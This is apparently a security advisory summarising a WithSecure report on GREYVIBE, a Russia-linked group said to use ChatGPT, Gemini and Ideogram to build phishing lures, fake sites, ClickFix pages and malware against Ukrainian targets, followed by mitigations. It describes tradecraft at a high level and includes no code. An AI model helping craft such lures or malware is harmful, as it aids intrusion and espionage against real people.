Technical description
WithSecure published a detailed threat intelligence report on GREYVIBE, a previously undocumented Russia-nexus threat group that has been systematically using generative AI (ChatGPT, Gemini, Ideogram AI) across all operational phases since August 2025 — including fake website creation, spear-phishing lure crafting, custom malware development (PhantomRelay, LegionRelay, Fallspy), obfuscation scripts, and post-compromise tooling. Notably, the LegionRelay malware was likely LLM-assisted but contained design flaws that allowed WithSecure to monitor the group's activities over an extended period.
Attack vector
Multi-vector AI-assisted campaigns: spear-phishing emails impersonating Ukrainian entities (Kyiv City Council, energy companies, emergency services); ClickFix fake CAPTCHA pages; fake adult-club websites (PrincessClub campaign) delivering Android spyware (Fallspy). AI used to accelerate tradecraft development, fill capability gaps, and generate a fresh operational profile that complicates attribution and tracking.
Affected systems
Ukrainian military, government, civilian, and business entities are primary targets. The group's AI-accelerated development model and operational profile represent a blueprint for how lower-sophistication actors globally will use LLMs to punch above their weight class.
Mitigation
Apply IOCs from the WithSecure report. Organizations outside Ukraine should treat this as a capability preview: AI-assisted social engineering will increase in sophistication and volume. Invest in AI-generated content detection for spear-phishing, ClickFix awareness training, and behavioral detection for loader-based malware chains that bypass signature detection.